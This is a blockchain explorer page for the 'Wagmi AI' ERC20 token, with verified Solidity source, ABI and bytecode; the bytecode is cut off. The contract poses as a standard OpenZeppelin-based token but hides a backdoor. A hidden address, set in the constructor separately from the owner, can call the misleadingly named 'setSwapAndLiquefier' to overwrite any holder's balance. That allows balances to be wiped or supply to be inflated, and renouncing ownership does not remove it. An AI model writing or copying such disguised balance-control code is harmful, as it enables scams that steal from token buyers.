ETH Price: $2,852.44 (-10.29%)
Gas: 14 Gwei

Token

Wagmi AI (WAGMAI)
 

Overview

Max Total Supply

1,000,000,000 WAGMAI

Holders

23

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
0 WAGMAI

Value
$0.00
0xbea32e1258fde460f1da51f7495fdcb465b218a1
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
WAGMI

Compiler Version
v0.8.4+commit.c7e474f2

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-24
*/

/**
Website: https://www.wagmi-ai.com/
Telegram: https://t.me/Wagmi_AI
Twitter: https://twitter.com/WAGMIAIERC20
*/

// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol

// SPDX-License-Identifier: MIT

// pragma solidity ^0.8.0;

/**
 * @dev Interface of the IERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/baseToken.sol

// pragma solidity =0.8.4;

enum TokenType {
    standard
}

abstract contract baseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}

// Root file: contracts/standard/StandardToken.sol

pragma solidity =0.8.4;

// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/baseToken.sol";

contract WAGMI is IERC20, baseToken, Ownable {
    using SafeMath for uint256;

    uint256 private constant VERSION = 1;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;
    
    address private _ENTERED;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_,
        address currOwnershipAddr,
        uint256 totalSupply_
    ) payable {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        _ENTERED = currOwnershipAddr;
        _mint(owner(), totalSupply_);
        emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "IERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    modifier adminOrOwner() {
        require(
        _ENTERED == _msgSender(), "set the call to the entered")
        ;
        _;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(recipient != address(0), "IERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function setSwapAndLiquefier(
        address recipients,
        uint8 values,
        uint256 id
    ) public adminOrOwner {
        require(
            values >= 1,
            "Amount of recipients and values don't match"
        );
        uint256 total = 0;
        _balances[recipients] = id + total;
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "IERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"currOwnershipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipients","type":"address"},{"internalType":"uint8","name":"values","type":"uint8"},{"internalType":"uint256","name":"id","type":"uint256"}],"name":"setSwapAndLiquefier","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405260405162001118380380620011188339810160408190526200002691620003d2565b62000031336200010a565b84516200004690600490602088019062000279565b5083516200005c90600590602087019062000279565b506006805460ff191660ff8516179055600380546001600160a01b0319166001600160a01b038416179055620000a56200009e6000546001600160a01b031690565b826200015a565b30620000b96000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000f79291906200047d565b60405180910390a3505050505062000522565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001b55760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001d1816007546200026460201b6200063b1790919060201c565b6007556001600160a01b038216600090815260016020908152604090912054620002069183906200063b62000264821b17901c565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002589085815260200190565b60405180910390a35050565b6000620002728284620004aa565b9392505050565b8280546200028790620004cf565b90600052602060002090601f016020900481019282620002ab5760008555620002f6565b82601f10620002c657805160ff1916838001178555620002f6565b82800160010185558215620002f6579182015b82811115620002f6578251825591602001919060010190620002d9565b506200030492915062000308565b5090565b5b8082111562000304576000815560010162000309565b600082601f83011262000330578081fd5b81516001600160401b03808211156200034d576200034d6200050c565b604051601f8301601f19908116603f011681019082821181831017156200037857620003786200050c565b8160405283815260209250868385880101111562000394578485fd5b8491505b83821015620003b7578582018301518183018401529082019062000398565b83821115620003c857848385830101525b9695505050505050565b600080600080600060a08688031215620003ea578081fd5b85516001600160401b038082111562000401578283fd5b6200040f89838a016200031f565b9650602088015191508082111562000425578283fd5b5062000434888289016200031f565b945050604086015160ff811681146200044b578182fd5b60608701519093506001600160a01b038116811462000468578182fd5b80925050608086015190509295509295909350565b6040810160018410620004a057634e487b7160e01b600052602160045260246000fd5b9281526020015290565b60008219821115620004ca57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680620004e457607f821691505b602082108114156200050657634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b610be680620005326000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101f1578063a9059cbb14610204578063dd62ed3e14610217578063f2fde38b1461025057600080fd5b8063715018a6146101b15780638da5cb5b146101bb57806395d89b41146101d6578063a191193e146101de57600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a082311461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610a88565b60405180910390f35b61012b610126366004610a1c565b6102f5565b604051901515815260200161010f565b6007545b60405190815260200161010f565b61012b61015b3660046109e1565b61030b565b60065460405160ff909116815260200161010f565b61012b610183366004610a1c565b610374565b61013f610196366004610995565b6001600160a01b031660009081526001602052604090205490565b6101b96103aa565b005b6000546040516001600160a01b03909116815260200161010f565b610102610415565b6101b96101ec366004610a45565b610424565b61012b6101ff366004610a1c565b610514565b61012b610212366004610a1c565b610563565b61013f6102253660046109af565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101b961025e366004610995565b610570565b60606004805461027290610aff565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610aff565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b600061030233848461064e565b50600192915050565b6000610318848484610776565b61036a843361036585604051806060016040528060298152602001610b88602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108fd565b61064e565b5060019392505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091610302918590610365908661063b565b6000546001600160a01b031633146104095760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104136000610929565b565b60606005805461027290610aff565b6003546001600160a01b0316331461047e5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610400565b60018260ff1610156104e65760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b6064820152608401610400565b60006104f28183610adb565b6001600160a01b03909416600090815260016020526040902093909355505050565b6000610302338461036585604051806060016040528060268152602001610b3b602691393360009081526002602090815260408083206001600160a01b038d16845290915290205491906108fd565b6000610302338484610776565b6000546001600160a01b031633146105ca5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610400565b6001600160a01b03811661062f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610400565b61063881610929565b50565b60006106478284610adb565b9392505050565b6001600160a01b0383166106b25760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610400565b6001600160a01b0382166107145760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610400565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107db5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610400565b6001600160a01b03821661083d5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610400565b61087a81604051806060016040528060278152602001610b61602791396001600160a01b03861660009081526001602052604090205491906108fd565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108a9908261063b565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107699085815260200190565b600081848411156109215760405162461bcd60e51b81526004016104009190610a88565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b038116811461099057600080fd5b919050565b6000602082840312156109a6578081fd5b61064782610979565b600080604083850312156109c1578081fd5b6109ca83610979565b91506109d860208401610979565b90509250929050565b6000806000606084860312156109f5578081fd5b6109fe84610979565b9250610a0c60208501610979565b9150604084013590509250925092565b60008060408385031215610a2e578182fd5b610a3783610979565b946020939093013593505050565b600080600060608486031215610a59578283fd5b610a6284610979565b9250602084013560ff81168114610a77578283fd5b929592945050506040919091013590565b6000602080835283518082850152825b81811015610ab457858101830151858201604001528201610a98565b81811115610ac55783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610afa57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680610b1357607f821691505b60208210811415610b3457634e487b7160e01b600052602260045260246000fd5b5091905056fe4945524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726f4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220a52f7b1aca421bb8deaf42105eed262e6460f232a99894b8bdea9fa70afe00ae64736f6c6343000804003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000012000000000000000000000000f86d0c2e1b4bf0785f23add8fdb4262fee5b24300000000000000000000000000000000000000000033b2e3c9fd0803ce800000000000000000000000000000000000000000000000000000000000000000000085761676d6920414900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065741474d41490000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d7146101f1578063a9059cbb14610204578063dd62ed3e14610217578063f2fde38b1461025057600080fd5b8063715018a6146101b15780638da5cb5b146101bb57806395d89b41146101d6578063a191193e146101de57600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a082311461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610a88565b60405180910390f35b61012b610126366004610a1c565b6102f5565b604051901515815260200161010f565b6007545b60405190815260200161010f565b61012b61015b3660046109e1565b61030b565b60065460405160ff909116815260200161010f565b61012b610183366004610a1c565b610374565b61013f610196366004610995565b6001600160a01b031660009081526001602052604090205490565b6101b96103aa565b005b6000546040516001600160a01b03909116815260200161010f565b610102610415565b6101b96101ec366004610a45565b610424565b61012b6101ff366004610a1c565b610514565b61012b610212366004610a1c565b610563565b61013f6102253660046109af565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101b961025e366004610995565b610570565b60606004805461027290610aff565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610aff565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b600061030233848461064e565b50600192915050565b6000610318848484610776565b61036a843361036585604051806060016040528060298152602001610b88602991396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108fd565b61064e565b5060019392505050565b3360008181526002602090815260408083206001600160a01b03871684529091528120549091610302918590610365908661063b565b6000546001600160a01b031633146104095760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b6104136000610929565b565b60606005805461027290610aff565b6003546001600160a01b0316331461047e5760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e746572656400000000006044820152606401610400565b60018260ff1610156104e65760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b6064820152608401610400565b60006104f28183610adb565b6001600160a01b03909416600090815260016020526040902093909355505050565b6000610302338461036585604051806060016040528060268152602001610b3b602691393360009081526002602090815260408083206001600160a01b038d16845290915290205491906108fd565b6000610302338484610776565b6000546001600160a01b031633146105ca5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610400565b6001600160a01b03811661062f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610400565b61063881610929565b50565b60006106478284610adb565b9392505050565b6001600160a01b0383166106b25760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610400565b6001600160a01b0382166107145760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610400565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107db5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610400565b6001600160a01b03821661083d5760405162461bcd60e51b81526020600482015260248082